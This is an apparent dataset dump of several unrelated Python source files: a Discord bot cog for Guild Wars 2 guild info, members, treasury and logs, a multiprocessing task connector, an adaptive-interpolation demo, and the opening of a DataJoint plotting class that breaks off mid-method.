text stringlengths 957 885k |
|---|
import datetime
import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
from discord.ext.commands.errors import BadArgument
from ..exceptions import APIError, APIForbidden, APINotFound
from ..utils.chat import embed_list_lines, zero_width_space
class GeneralGuild:
    # NOTE(review): mixin-style command cog. It relies on the composing class
    # to provide get_guild, call_api, call_multiple, error_handler,
    # get_embed_color, get_emoji, fetch_item, gold_to_coins and self.bot —
    # confirm against the class this is mixed into.
    @commands.group(case_insensitive=True)
    async def guild(self, ctx):
        """Guild related commands."""
        # Bare "guild" invocation with no subcommand: show the group help.
        if ctx.invoked_subcommand is None:
            await ctx.send_help(ctx.command)

    @guild.command(name="info", usage="<guild name>")
    @commands.cooldown(1, 20, BucketType.user)
    async def guild_info(self, ctx, *, guild_name=None):
        """General guild stats
        Required permissions: guilds
        """
        # Read preferred guild from DB
        try:
            # get_guild resolves guild_name (or the server default) to a
            # guild record; a falsy result means nothing matched.
            guild = await self.get_guild(ctx, guild_name=guild_name)
            if not guild:
                raise BadArgument
            guild_id = guild["id"]
            guild_name = guild["name"]
            endpoint = "guild/{0}".format(guild_id)
            results = await self.call_api(endpoint, ctx.author, ["guilds"])
        except (IndexError, APINotFound):
            return await ctx.send("Invalid guild name")
        except APIForbidden:
            return await ctx.send(
                "You don't have enough permissions in game to "
                "use this command")
        except APIError as e:
            return await self.error_handler(ctx, e)
        data = discord.Embed(
            description='General Info about {0}'.format(guild_name),
            colour=await self.get_embed_color(ctx))
        data.set_author(name="{} [{}]".format(results["name"], results["tag"]))
        # "member_count" rides along with the currencies so it can be
        # special-cased below and rendered as a count/capacity pair.
        guild_currencies = [
            "influence", "aetherium", "resonance", "favor", "member_count"
        ]
        for cur in guild_currencies:
            if cur == "member_count":
                data.add_field(name='Members',
                               value="{} {}/{}".format(
                                   self.get_emoji(ctx, "friends"),
                                   results["member_count"],
                                   str(results["member_capacity"])))
            else:
                data.add_field(name=cur.capitalize(),
                               value='{} {}'.format(self.get_emoji(ctx, cur),
                                                    results[cur]))
        # MOTD is only present if the API key holder can read it.
        if "motd" in results:
            data.add_field(name='Message of the day:',
                           value=results["motd"],
                           inline=False)
        data.set_footer(text='A level {} guild'.format(results["level"]))
        try:
            await ctx.send(embed=data)
        except discord.Forbidden:
            # Bot lacks the "Embed Links" permission in this channel.
            await ctx.send("Need permission to embed links")

    @guild.command(name="members", usage="<guild name>")
    @commands.cooldown(1, 20, BucketType.user)
    async def guild_members(self, ctx, *, guild_name=None):
        """Shows a list of members and their ranks.
        Required permissions: guilds and in game permissions
        """
        user = ctx.author
        scopes = ["guilds"]
        try:
            guild = await self.get_guild(ctx, guild_name=guild_name)
            if not guild:
                raise BadArgument
            guild_id = guild["id"]
            guild_name = guild["name"]
            endpoints = [
                "guild/{}/members".format(guild_id),
                "guild/{}/ranks".format(guild_id)
            ]
            results, ranks = await self.call_multiple(endpoints, user, scopes)
        except (IndexError, APINotFound):
            return await ctx.send("Invalid guild name")
        except APIForbidden:
            return await ctx.send(
                "You don't have enough permissions in game to "
                "use this command")
        except APIError as e:
            return await self.error_handler(ctx, e)
        data = discord.Embed(description=zero_width_space,
                             colour=await self.get_embed_color(ctx))
        data.set_author(name=guild_name.title())
        order_id = 1
        # For each order the rank has, go through each member and add it with
        # the current order increment to the embed
        lines = []

        async def get_guild_member_mention(account_name):
            # Map a GW2 account name to a Discord mention if that account is
            # linked to a member of this Discord server. Checks both the
            # single-key and multi-key storage layouts in the users database.
            cursor = self.bot.database.iter(
                "users", {
                    "$or": [{
                        "cogs.GuildWars2.key.account_name": account_name
                    }, {
                        "cogs.GuildWars2.keys.account_name": account_name
                    }]
                })
            async for doc in cursor:
                member = ctx.guild.get_member(doc["_id"])
                if member:
                    return member.mention
            return ""

        for order in ranks:
            for member in results:
                # Filter invited members
                if member['rank'] != "invited":
                    member_rank = member['rank']
                    # associate order from /ranks with rank from /members
                    for rank in ranks:
                        if member_rank == rank['id']:
                            if rank['order'] == order_id:
                                mention = await get_guild_member_mention(
                                    member["name"])
                                if mention:
                                    mention = f" - {mention}"
                                line = "**{}**{}\n*{}*".format(
                                    member['name'], mention, member['rank'])
                                # Stay below Discord's 6000-char embed limit.
                                if len(str(lines)) + len(line) < 6000:
                                    lines.append(line)
            order_id += 1
        data = embed_list_lines(data, lines, "> **MEMBERS**", inline=True)
        try:
            await ctx.send(embed=data)
        except discord.Forbidden:
            await ctx.send("Need permission to embed links")

    @guild.command(name="treasury", usage="<guild name>")
    @commands.cooldown(1, 20, BucketType.user)
    async def guild_treasury(self, ctx, *, guild_name=None):
        """Get list of current and needed items for upgrades
        Required permissions: guilds and in game permissions"""
        # Read preferred guild from DB
        try:
            guild = await self.get_guild(ctx, guild_name=guild_name)
            if not guild:
                raise BadArgument
            guild_id = guild["id"]
            guild_name = guild["name"]
            endpoint = "guild/{0}/treasury".format(guild_id)
            treasury = await self.call_api(endpoint, ctx.author, ["guilds"])
        except (IndexError, APINotFound):
            return await ctx.send("Invalid guild name")
        except APIForbidden:
            return await ctx.send(
                "You don't have enough permissions in game to "
                "use this command")
        except APIError as e:
            return await self.error_handler(ctx, e)
        data = discord.Embed(description=zero_width_space,
                             colour=await self.get_embed_color(ctx))
        data.set_author(name=guild_name.title())
        item_counter = 0
        amount = 0
        lines = []
        itemlist = []
        # Resolve every treasury item id to its item document first;
        # itemlist is index-aligned with treasury.
        for item in treasury:
            res = await self.fetch_item(item["item_id"])
            itemlist.append(res)
        # Collect amounts
        if treasury:
            for item in treasury:
                current = item["count"]
                item_name = itemlist[item_counter]["name"]
                needed = item["needed_by"]
                # Total still needed across all upgrades wanting this item.
                for need in needed:
                    amount = amount + need["count"]
                # Only show items that are not yet fully stocked.
                if amount != current:
                    line = "**{}**\n*{}*".format(
                        item_name,
                        str(current) + "/" + str(amount))
                    # Stay below Discord's 6000-char embed limit.
                    if len(str(lines)) + len(line) < 6000:
                        lines.append(line)
                amount = 0
                item_counter += 1
        else:
            await ctx.send("Treasury is empty!")
            return
        data = embed_list_lines(data, lines, "> **TREASURY**", inline=True)
        try:
            await ctx.send(embed=data)
        except discord.Forbidden:
            await ctx.send("Need permission to embed links")

    @guild.command(name="log", usage="stash/treasury/members <guild name>")
    @commands.cooldown(1, 10, BucketType.user)
    async def guild_log(self, ctx, log_type, *, guild_name=None):
        """Get log of stash/treasury/members
        Required permissions: guilds and in game permissions"""
        state = log_type.lower()
        # API event types that make up the "members" view.
        member_list = [
            "invited", "joined", "invite_declined", "rank_change", "kick"
        ]
        if state not in ("stash", "treasury", "members"):
            return await ctx.send_help(ctx.command)
        try:
            guild = await self.get_guild(ctx, guild_name=guild_name)
            if not guild:
                raise BadArgument
            guild_id = guild["id"]
            guild_name = guild["name"]
            endpoint = "guild/{0}/log/".format(guild_id)
            log = await self.call_api(endpoint, ctx.author, ["guilds"])
        except (IndexError, APINotFound):
            return await ctx.send("Invalid guild name")
        except APIForbidden:
            return await ctx.send(
                "You don't have enough permissions in game to "
                "use this command")
        except APIError as e:
            return await self.error_handler(ctx, e)
        data = discord.Embed(description=zero_width_space,
                             colour=await self.get_embed_color(ctx))
        data.set_author(name=guild_name.title())
        lines = []
        length_lines = 0
        for entry in log:
            # stash/treasury entries match the requested state directly.
            if entry["type"] == state:
                time = entry["time"]
                timedate = datetime.datetime.strptime(
                    time, "%Y-%m-%dT%H:%M:%S.%fZ").strftime('%d.%m.%Y %H:%M')
                user = entry["user"]
                if state == "stash" or state == "treasury":
                    quantity = entry["count"]
                    # item_id 0 means the entry is raw coins, not an item.
                    if entry["item_id"] == 0:
                        item_name = self.gold_to_coins(ctx, entry["coins"])
                        quantity = ""
                        multiplier = ""
                    else:
                        itemdoc = await self.fetch_item(entry["item_id"])
                        item_name = itemdoc["name"]
                        multiplier = "x"
                    if state == "stash":
                        if entry["operation"] == "withdraw":
                            operator = " withdrew"
                        else:
                            operator = " deposited"
                    else:
                        operator = " donated"
                    line = "**{}**\n*{}*".format(
                        timedate, user + "{} {}{} {}".format(
                            operator, quantity, multiplier, item_name))
                    # Keep headroom under the embed character limit.
                    if length_lines + len(line) < 5500:
                        length_lines += len(line)
                        lines.append(line)
            # "members" is a synthetic view built from several event types.
            if state == "members":
                entry_string = ""
                if entry["type"] in member_list:
                    time = entry["time"]
                    timedate = datetime.datetime.strptime(
                        time,
                        "%Y-%m-%dT%H:%M:%S.%fZ").strftime('%d.%m.%Y %H:%M')
                    user = entry["user"]
                    if entry["type"] == "invited":
                        invited_by = entry["invited_by"]
                        entry_string = "{} has invited {} to the guild.".format(
                            invited_by, user)
                    elif entry["type"] == "joined":
                        entry_string = "{} has joined the guild.".format(user)
                    elif entry["type"] == "kick":
                        kicked_by = entry["kicked_by"]
                        # Self-kick is how the API records a voluntary leave.
                        if kicked_by == user:
                            entry_string = "{} has left the guild.".format(
                                user)
                        else:
                            entry_string = "{} has been kicked by {}.".format(
                                user, kicked_by)
                    elif entry["type"] == "rank_change":
                        old_rank = entry["old_rank"]
                        new_rank = entry["new_rank"]
                        if "changed_by" in entry:
                            changed_by = entry["changed_by"]
                            entry_string = "{} has changed the role of {} from {} to {}.".format(
                                changed_by, user, old_rank, new_rank)
                        else:
                            entry_string = "{} changed his role from {} to {}.".format(
                                user, old_rank, new_rank)
                    line = "**{}**\n*{}*".format(timedate, entry_string)
                    if length_lines + len(line) < 5500:
                        length_lines += len(line)
                        lines.append(line)
        if not lines:
            return await ctx.send("No {} log entries yet for {}".format(
                state, guild_name.title()))
        data = embed_list_lines(data, lines,
                                "> **{0} Log**".format(state.capitalize()))
        try:
            await ctx.send(embed=data)
        except discord.Forbidden:
            await ctx.send("Need permission to embed links")

    @guild.command(name="default", usage="<guild name>")
    @commands.guild_only()
    @commands.cooldown(1, 10, BucketType.user)
    @commands.has_permissions(manage_guild=True)
    async def guild_default(self, ctx, *, guild_name=None):
        """ Set your preferred guild for guild commands on this Discord Server.
        Commands from the guild command group invoked
        without a guild name will default to this guild.
        Invoke this command without an argument to reset the default guild.
        """
        guild = ctx.guild
        # No argument: clear the stored default for this Discord server.
        if guild_name is None:
            await self.bot.database.set_guild(guild, {
                "guild_ingame": None,
            }, self)
            return await ctx.send(
                "Your preferred guild is now reset for "
                "this server. Invoke this command with a guild "
                "name to set a default guild.")
        endpoint_id = "guild/search?name=" + guild_name.replace(' ', '%20')
        # Guild ID to Guild Name
        try:
            # The search endpoint returns a list of ids; take the first match
            # (IndexError on an empty result is handled as "invalid name").
            guild_id = await self.call_api(endpoint_id)
            guild_id = guild_id[0]
        except (IndexError, APINotFound):
            return await ctx.send("Invalid guild name")
        except APIForbidden:
            return await ctx.send(
                "You don't have enough permissions in game to "
                "use this command")
        except APIError as e:
            return await self.error_handler(ctx, e)
        # Write to DB, overwrites existing guild
        await self.bot.database.set_guild(guild, {
            "guild_ingame": guild_id,
        }, self)
        await ctx.send("Your default guild is now set to {} for this server. "
                       "All commands from the `guild` command group "
                       "invoked without a specified guild will default to "
                       "this guild. To reset, simply invoke this command "
                       "without specifying a guild".format(guild_name.title()))
|
<filename>erised/connector.py<gh_stars>0
from __future__ import annotations
import itertools
import multiprocessing as mp
import queue
from typing import Any, Dict, Iterator, Optional, Tuple
from erised.future import Future, FutureState
from erised.remote import run
from erised.task import CallTask, GetAttrTask, SetAttrTask, Task, TaskResult
class Connector:
    """Proxy that executes tasks against ``obj`` in a separate process.

    Tasks are pushed onto ``_queue_out``, executed by ``erised.remote.run``
    in a child process, and results come back on ``_queue_in``.  Each
    submitted task gets a :class:`Future` that is resolved lazily by
    :meth:`_get`.
    """

    def __init__(self, obj: Any):
        self._obj = obj
        # "in"/"out" are named from this side's perspective; they are
        # deliberately crossed when handed to the child process.
        self._queue_in: mp.Queue[TaskResult] = mp.Queue()
        self._queue_out: mp.Queue[Task] = mp.Queue()
        self._process = mp.Process(
            target=run,
            kwargs={
                "obj": self._obj,
                "queue_in": self._queue_out,
                "queue_out": self._queue_in,
            },
        )
        # Futures for submitted-but-unfinished tasks, keyed by task id.
        self._waiting_futures: Dict[int, Future] = {}
        self._process.start()

    def call(
        self, attr: str, args: Tuple[Any, ...] = None, kwargs: Dict[str, Any] = None
    ) -> Future:
        """Schedule a remote method call ``obj.<attr>(*args, **kwargs)``.

        Returns a Future that resolves once the child process has run it.
        """
        if args is None:
            args = tuple()
        if kwargs is None:
            kwargs = {}
        # NOTE(review): the "or" fallbacks below are redundant after the
        # None-checks above; kept as-is.
        task = CallTask(
            attr=attr,
            args=args or tuple(),
            kwargs=kwargs or dict(),
        )
        self._queue_out.put(task)
        return self._create_future(task.id)

    def setattr(self, attr: str, name: str, value: Any) -> Future:
        """Schedule setting ``obj.<attr>.<name> = value`` remotely."""
        task = SetAttrTask(attr=attr, name=name, value=value)
        self._queue_out.put(task)
        return self._create_future(task.id)

    def getattr(self, attr: str, name: str) -> Future:
        """Schedule reading ``obj.<attr>.<name>`` remotely."""
        task = GetAttrTask(attr=attr, name=name)
        self._queue_out.put(task)
        return self._create_future(task.id)

    def terminate(self):
        """Kill the worker process.  Pending futures will never resolve."""
        self._process.terminate()

    def _create_future(self, task_id: int) -> Future:
        # Register the future so _get can resolve it when its result arrives.
        future = Future(task_id=task_id, connector=self)
        self._waiting_futures[task_id] = future
        return future

    def _get(self, task_id: Optional[int] = None, timeout: Optional[int] = None):
        """Drain results until ``task_id`` is resolved (or, if ``task_id`` is
        None, until no futures are waiting).

        Raises ValueError when the requested id cannot be pending.  NOTE:
        the min/max range test below is a heuristic — it assumes task ids
        are allocated monotonically; ids inside the range that were already
        resolved are not detected here (they raise KeyError on pop instead).
        """
        if len(self._waiting_futures) == 0 or (
            task_id is not None
            and not min(self._waiting_futures) <= task_id <= max(self._waiting_futures)
        ):
            raise ValueError(
                f"Task wasn't set to run, or have already been run: task_id = {task_id}"
            )
        while len(self._waiting_futures) > 0:
            # Blocks until the child process produces the next result.
            task_result = self._queue_in.get(timeout=timeout)
            future = self._waiting_futures.pop(task_result.task_id)
            future._state = FutureState.FINISHED
            future._result = task_result.value
            future._exception = task_result.exception
            if task_result.task_id == task_id:
                return

    def empty_queue(self):
        """Resolve every outstanding future (blocks until all are done)."""
        self._get()
class LocalConnector(Connector):
    """Synchronous, single-process drop-in for :class:`Connector`.

    Tasks are queued exactly like in ``Connector`` but executed lazily in
    this process against the wrapped object — no child process is spawned.
    Useful for debugging and testing.
    """

    def __init__(self, obj):
        # Deliberately does NOT call super().__init__: no mp.Process is
        # started, and plain queue.Queue replaces mp.Queue.
        self._obj = obj
        self._queue_in: queue.Queue[TaskResult] = queue.Queue()
        self._queue_out: queue.Queue[Task] = queue.Queue()
        self._id_counter: Iterator[int] = itertools.count()
        self._waiting_futures: Dict[int, Future] = {}

    def __del__(self):
        # Flush pending tasks so their futures can still resolve.
        self._process_all_waiting_tasks()

    def terminate(self):
        """Nothing to kill locally; just drain outstanding work."""
        self._process_all_waiting_tasks()

    def _get(self, task_id: Optional[int] = None, timeout: Optional[int] = None):
        # BUG FIX: task_id must default to None, matching Connector._get.
        # Previously it was a required parameter, so the inherited
        # empty_queue() — which calls self._get() with no arguments —
        # raised TypeError on LocalConnector instances.
        self._process_all_waiting_tasks()
        super()._get(task_id=task_id, timeout=timeout)

    def _process_all_waiting_tasks(self):
        """Run every queued task against the wrapped object, synchronously."""
        while not self._queue_out.empty():
            task = self._queue_out.get()
            task_result = task.do(self._obj)
            self._queue_in.put(task_result)
|
<gh_stars>1-10
"""
Demonstration of capabilities of the module
"""
from __future__ import absolute_import
import time
import numpy as np
import numpy.linalg as la
import scipy.special as spec
import matplotlib.pyplot as plt
import adaptive_interpolation.adapt as adapt
import adaptive_interpolation.generate as generate
import adaptive_interpolation.approximator as app
import adaptive_interpolation.adaptive_interpolation as adapt_i
# Optional dependencies: animation support and OpenCL-accelerated evaluation.
# Narrowed from bare "except:" (which would also swallow KeyboardInterrupt
# and SystemExit) to ImportError — the only failure these guards are for.
try:
    import matplotlib.animation as animation
except ImportError:
    animate = False
try:
    import pyopencl
    with_pyopencl = True
except ImportError:
    with_pyopencl = False
# bessel function for testing
def f(x):
    """Order-0 Bessel function of the first kind, J0(x) — smooth test target.

    Uses ``scipy.special.jv`` directly: ``scipy.special.jn`` was only a
    deprecated alias of ``jv`` and has been removed from modern SciPy.
    ``jv(0, x)`` returns the identical values.
    """
    return spec.jv(0, x)
def g(x):
    """Morse-style exponential term: (1 - exp(-1.1 * (x - 1)))**2."""
    decay = np.exp(-1.1 * (x - 1.0))
    return (1.0 - decay) ** 2
def morse_potential(x):
    # Morse-style potential built from the sibling g() above, normalized by
    # its value at x = 0.2 (so morse_potential(0.2) == 1).
    return g(x)/g(.2)
# a function for testing
def f1(x0):
    """Discontinuous piecewise test function on [0, 11].

    Inputs with no matching interval (x > 11) are silently dropped, so the
    returned array can be shorter than the input.
    """
    # (first-match predicate, branch) table; the elif chain of the original
    # guarantees only the upper bound needs testing on each row.
    branches = (
        (lambda v: v < 1,      lambda v: 1 + v),
        (lambda v: v < 2.02,   lambda v: 1 + v**2),
        (lambda v: v < 3.5,    lambda v: -3*np.log(v)),
        (lambda v: v < 4.4,    lambda v: np.exp(np.sqrt(v))),
        (lambda v: v < 7.001,  lambda v: 3),
        (lambda v: v < 9.306,  lambda v: np.sqrt(v**4.4) / 100.),
        (lambda v: v <= 11,    lambda v: v - 3),
    )
    values = []
    for v in x0:
        for matches, branch in branches:
            if matches(v):
                values.append(branch(v))
                break
    return np.array(values)
# plot the absolute errors as well as the actual and approximated functions
def my_plot(x, actual, approximation, abs_errors, allowed_error, ap):
    """Plot the true vs. interpolated values, then the error profile.

    Opens two figures: (1) actual vs. approximated values; (2) a log-scale
    plot of absolute errors with the allowed-error line, interval boundaries
    of the approximator, and its per-interval relative errors.  Blocks on
    plt.show().
    """
    plt.figure()
    plt.title('Actual and Approximate values Graphed')
    t, = plt.plot(x, actual, 'r', label='True Values')
    e, = plt.plot(x, approximation, 'b', label='Interpolated Values')
    plt.legend(handles=[t, e], loc=0)
    plt.figure()
    plt.yscale('log')
    plt.title('Absolute Error in Interpolated Values')
    # +1e-17 keeps exact zeros visible on the log scale.
    a, = plt.plot(x, abs_errors+1e-17, 'g', label='Absolute Errors')
    b, = plt.plot(x, 0*x + allowed_error, 'r', label='Maximum Allowed Relative Error')
    # Mark every distinct interval boundary of the approximator.
    all_ranges = []
    for my_range in ap.ranges:
        all_ranges.append(my_range[0])
        all_ranges.append(my_range[1])
    for val in list(set(all_ranges)):
        plt.axvline(x=val)
    c, = plt.plot(ap.used_midpoints, ap.used_errors, 'bs', label='Relative Errors')
    plt.legend(handles=[a, b, c], loc=0, fontsize='small')
    plt.show()
# This will demo the capabilities of interpolating a function with a fixed order method
# basis is a string specifying your basis. function is the given function to interpolate
# allowed error is the maximum relative error allowed on the entire interval.
def demo_adapt(function, order, allowed_error, basis,
               adapt_type="Trivial", accurate=True, animate=False, a=0, b=10,
               opt=None):
    """Build, evaluate and plot an adaptive interpolant of ``function``.

    Parameters
    ----------
    function : callable accepting a numpy array
    order : int, polynomial order of the interpolant
    allowed_error : float, maximum relative error on [a, b]
    basis : str, e.g. 'chebyshev' or 'monomial'
    adapt_type : str, adaptation strategy (default "Trivial")
    accurate : bool, passed through to make_interpolant
    animate : bool, if True animate the refinement levels and save adapt.mp4
    a, b : interval endpoints
    opt : list of code-generation optimizations (default: none)
    """
    # BUG FIX: the default was a mutable list (opt=[]) shared across calls;
    # use the None sentinel instead.
    if opt is None:
        opt = []
    print("Creating Interpolant")
    my_approx = adapt_i.make_interpolant(a, b, function, order,
                                         allowed_error, basis, adapt_type,
                                         '32', accurate, optimizations=opt)
    print("\nGenerated Code:\n")
    N = 2**10
    adapt_i.generate_code(my_approx, size=N, cpu=True)
    print(my_approx.code)
    print("Evaluating Interpolant")
    x = np.linspace(a, b, N, dtype=np.float64)
    # NOTE(review): the pyopencl path is deliberately disabled ("and False");
    # evaluation always goes through evaluate_tree.
    if with_pyopencl and False:
        est = adapt_i.run_approximation(x, my_approx)
    else:
        est = my_approx.evaluate_tree(x)
    print("Evaluating Function")
    true = function(x)
    print("Plotting")
    # not working with tree version
    if animate:
        fig = plt.figure()
        ax1 = fig.add_subplot(1, 2, 2)
        ax2 = fig.add_subplot(1, 2, 1)
        ax2.set_yscale("log")
        ims = []
        # traverse levels 1 to end
        for i in range(int(my_approx.num_levels)):
            print("Plotting Level: ", i, '/', my_approx.num_levels-1)
            ims.append([])
            im0, = ax1.plot(x, function(x), 'r')
            rel, = ax2.plot(x, 0*x+allowed_error, 'r')
            ax1.set_xlabel("x")
            ax1.set_ylabel("y")
            ax1.set_title("True Function vs. Approximation")
            ax2.set_xlabel("x")
            ax2.set_ylabel("Errors")
            ax2.set_title("Relative and Absolute Errors on Intervals")
            ims[i].append(im0)
            ims[i].append(rel)
            # BUG FIX: np.linspace requires an integer sample count; the
            # float literal 1e5 raises TypeError on NumPy >= 1.18.
            t = np.linspace(a, b, 100000)
            y, data = my_approx.evaluate_tree(t, i+1, 1)
            midpoints = [elem[0] for elem in data]
            ranges = [elem[2] for elem in data]
            rel_errors = [elem[3] for elem in data]
            er = abs(np.array(y) - function(t))
            im2, = ax1.plot(t, y, 'b')
            im3, = ax2.plot(t, er, 'g')
            for r in ranges:
                im4 = ax2.axvline(x=r[0])
                ims[i].append(im4)
            im5, = ax2.plot(midpoints, rel_errors, 'bs')
            ims[i].append(im2)
            ims[i].append(im3)
            ims[i].append(im5)
            im6 = ax2.axvline(x=ranges[-1][1])
            ims[i].append(im6)
        ani = animation.ArtistAnimation(fig, ims, interval=1000)
        ani.save("adapt.mp4")
        plt.show()
    else:
        my_plot(x, true, est, abs(true-est), allowed_error, my_approx)
def main_demo():
    """Run the three showcase interpolations: Bessel, sin(1/x), piecewise."""
    intro = [
        "\nIn this demo three functions will be evaluated and",
        "plotted, demonstrating some capabilities of this package.",
        "This includes a special function, a highly oscillatory",
        "function and a discontinuous function.",
        "The code generated to evaluate each function will also be displayed.",
    ]
    for message in intro:
        print(message)
    # Special function: 0th-order Bessel, Remez adaptation.
    print("\n0th order Bessel Function")
    demo_adapt(f, 10, 1e-13, 'chebyshev', 'Remez')
    # Highly oscillatory function on (0.01, 1].
    print("\nsin(1/x)")
    my_f = lambda x: np.sin(np.float64(1.)/x)
    demo_adapt(my_f, 20, 1e-10, 'chebyshev', a=.01, b=1)
    # Discontinuous piecewise function, variable-order adaptation.
    print("\nA piecewise function")
    demo_adapt(f1, 6, 1e-4, 'monomial', 'Variable')
# run the main program
if __name__ == "__main__":
    #main_demo()
    # Quick single-function demo: low-order chebyshev fit of the Bessel
    # test function with code-generation optimizations enabled.
    opt = ["arrays", "map"]
    demo_adapt(f, 5, 1e-3, 'chebyshev', accurate=False, b=10, opt=opt)
|
<filename>dj_plotter/plotter.py
### DATAJOINT + PLOTTING CLASS
from copy import copy
import pathlib
from datetime import datetime
import numpy as np
import pandas as pd
# Drawing
from matplotlib import pyplot as plt
import seaborn as sns
from tqdm.auto import tqdm
# Load more colormaps
import cmasher as cmr
# ... for ROI processing
from scipy.ndimage.morphology import distance_transform_edt
from skimage.filters import gaussian
# Helpers
from .helpers.plotting_helpers import make_circular_colormap, make_linear_colormap
from .helpers.dj_utils import make_multi_recording_object_dict, get_signal_indices
# Stylesheets
# Imports default styles and style dictionary
from .helpers.stylesheet import *
# Additional matplotlib options
import matplotlib as mpl
mpl.rcParams['pdf.fonttype'] = 42 # Fix bug in PDF export
from mpl_toolkits.axes_grid1 import make_axes_locatable
# Load base schema
import datajoint as dj
schema = dj.schema(dj.config['dj_imaging.database'])
schema.spawn_missing_classes()
### PLOTTING CLASS
class dj_plotter():
''' Generate plots from datajoint objects. '''
# Define which attributes (=column names) are required for functions to run
RECORDING_HASH = 'recording_name'
RECORDING_HASH_OV = 'base_session'
ANIMAL_NAME = 'animal_name'
TIMESTAMP = 'timestamp'
ATTR_TUNINGMAP = ['tuningmap','mask_tm','cell_id']
ATTR_AUTOCORR = ['acorr','cell_id']
ATTR_ROIS = ['center_x','center_y','xpix','ypix','x_range','y_range', 'lambda']
ATTR_ROIS_CORR = ['center_x_corr','center_y_corr','xpix_corr','ypix_corr','x_range_microns_eff','y_range_microns_eff', 'lambda_corr']
ATTR_TRACKING = ['x_pos','y_pos','speed','head_angle']
ATTR_PATHEVENT = [*ATTR_TRACKING, 'signal', 'x_pos_signal','y_pos_signal','head_angle_signal']
ATTR_TUNINGMAP_OV = [] # For object vector case these data are retrieved "online"
ATTR_PATHEVENT_OV = [] # "
ATTR_HDTUNING = ['angle_centers', 'angular_occupancy', 'angular_tuning']
def __init__(self, dj_object, keys=None, *args, **kwargs):
'''
Takes a datajoint object (table or join) and generates figures.
Example usage:
Parameters
----------
dj_object : datajoint.expression.Join or table (basic restriction)
Actual join object.
keys : dict or numpy array
Keys to be looped over. Retrieved by .fetch() operation (dict or numpy array)
**kwargs:
plots_per_view : int
Number of subplots per figure (maximum 25, since layout is 5x5)
font_scale : float
Seaborn font_scale
total : int
Total number of plots to show
save_path : string or Pathlib path
If given, will auto-export the figure under this path
save_format : string
'pdf', 'png', ...
Default: 'pdf'
style : string
'dark_background', 'default'
Check plt.style.available for all possible options
Default: 'default'
'''
# Main input
self.dj_object = dj_object
self.keys = keys
# Process keywords
self.plots_per_view = kwargs.get('plots_per_view',25)
if self.plots_per_view > 25:
raise ValueError('Maximum number of subplots is 25')
self.font_scale = kwargs.get('font_scale', 1.)
self.total = kwargs.get('total', None)
self.save_path = kwargs.get('save_path', None)
if self.save_path is not None:
if isinstance(self.save_path, str):
self.save_path = pathlib.Path(self.save_path)
self.save_format = kwargs.get('save_format', 'pdf')
assert self.save_format in ['pdf','png','jpg'], f'Format "{self.save_format}" not recognized'
self.style = kwargs.get('style', 'default')
if self.style != 'default':
assert self.style in plt.style.available, f'Plotting style "{self.style}" does not exist.\nPossible options:\n{plt.style.available}'
def __repr__(self):
    # List the datajoint column names so users can see what is available.
    return f'DJ plotter class\nAvailable attributes:\n{self.__attributes}'
@property
def __attributes(self):
    ''' Return attributes in datajoint object (column names) '''
    # heading.names is the datajoint API for the joined table's columns.
    return self.dj_object.heading.names
def __check_join_integrity(self, keyword):
'''
Check if attribute (=column) exists in datajoint join object.
Parameters
----------
keyword : string or list of strings
These are the keywords that should be checked
Returns
-------
valid : boolean
True only if all keywords have been matched
'''
valid = False
if isinstance(keyword,str):
valid = keyword in self.__attributes
elif isinstance(keyword,list):
valid = all([self.__check_join_integrity(key_) for key_ in keyword])
return valid
@property
def __create_figure_single(self):
    ''' Create standard figure'''
    # NOTE: property returns a NEW 10x10 figure on every access, after
    # applying the configured seaborn font scale and matplotlib style.
    sns.set(font_scale=self.font_scale)
    plt.style.use(self.style)
    return plt.figure(figsize=(10,10))
@property
def __create_figure_grid(self):
    ''' Create standard figure for grid display of subplots '''
    # NOTE: property returns a NEW 20x20 figure (for the 5x5 grid) on
    # every access, after applying font scale and style.
    sns.set(font_scale=self.font_scale)
    plt.style.use(self.style)
    return plt.figure(figsize=(20,20))
@property
def __create_figure_grid_ov_2(self):
    ''' Create standard (object vector) figure for grid display of 2 subplots '''
    # NOTE: property returns a NEW 6x3 figure on every access.
    sns.set(font_scale=self.font_scale)
    plt.style.use(self.style)
    return plt.figure(figsize=(6,3))
@property
def __create_figure_grid_ov_3(self):
    ''' Create standard (object vector) figure for grid display of 3 subplots '''
    # NOTE: property returns a NEW 9x3 figure on every access.
    sns.set(font_scale=self.font_scale)
    plt.style.use(self.style)
    return plt.figure(figsize=(9,3))
def __title(self, entry, display_score, hash_or_animal, show_cell=True, ov=False):
''' Create subplot title string '''
if hash_or_animal == 'hash':
if not ov:
hash_or_animal_string = entry[self.RECORDING_HASH]
else:
hash_or_animal_string = entry[self.RECORDING_HASH_OV]
elif hash_or_animal == 'animal':
ts = datetime.strftime(entry[self.TIMESTAMP],'| %d.%m.%Y | %H:%M')
hash_or_animal_string = f'{entry[self.ANIMAL_NAME]} {ts}'
if show_cell:
if display_score is not None:
title = r'C{} {} | {:.2f}'.format(entry['cell_id'], hash_or_animal_string, entry[display_score])
else:
title = r'C{} {}'.format(entry['cell_id'], hash_or_animal_string)
else:
title = r'{}'.format(hash_or_animal_string)
return title
def __now(self):
return datetime.strftime(datetime.now(),'%d.%m.%Y %H-%M-%S-%f')
def __tqdm_iterator(self, iterator, total, desc, leave=False):
    ''' Create a tqdm progress bar over enumerate(iterator).

    leave=False clears the bar from the display once the loop finishes.
    '''
    return tqdm(enumerate(iterator), desc=desc, total=total, leave=leave)
####################################################################################################
######################### DRAWING
def tuningmaps(self, **kwargs):
    '''
    Plot tuningmaps in 5x5 grid
    Optionally shows score for every subplot if available.
    Parameters
    ----------
    **kwargs:
        cmap : string
            Valid matplotlib colormap string
            https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
            or https://github.com/1313e/CMasher
        hash_or_animal: string
            'hash' or 'animal'
            Determines whether session name (hash) or animal/timestamp
            combination should be displayed in title of each subplot.
            Defaults to 'animal'
        display_score : string
            Name of the score (=column name) to display in title
            of each subplot.
            Defaults to None.
        axes_lw : float
            axes linewidth. Default 5.
        display_title : bool
            Show title?
        cue_card_pos : list or string
            Cue card position in (tracked) field ['north','south','west','east']
        ax : axis
            Matplotlib axis to draw into (only valid when exactly one
            plot is drawn)
    '''
    # Process kwargs
    cmap = kwargs.get('cmap', 'magma')
    cmap = plt.get_cmap(cmap)
    display_score = kwargs.get('display_score', None)
    hash_or_animal = kwargs.get('hash_or_animal', 'animal')
    axes_lw = kwargs.get('axes_lw', 5.)
    display_title = kwargs.get('display_title', True)
    cue_card_pos = kwargs.get('cue_card_pos', None)
    ax = kwargs.get('ax', None)
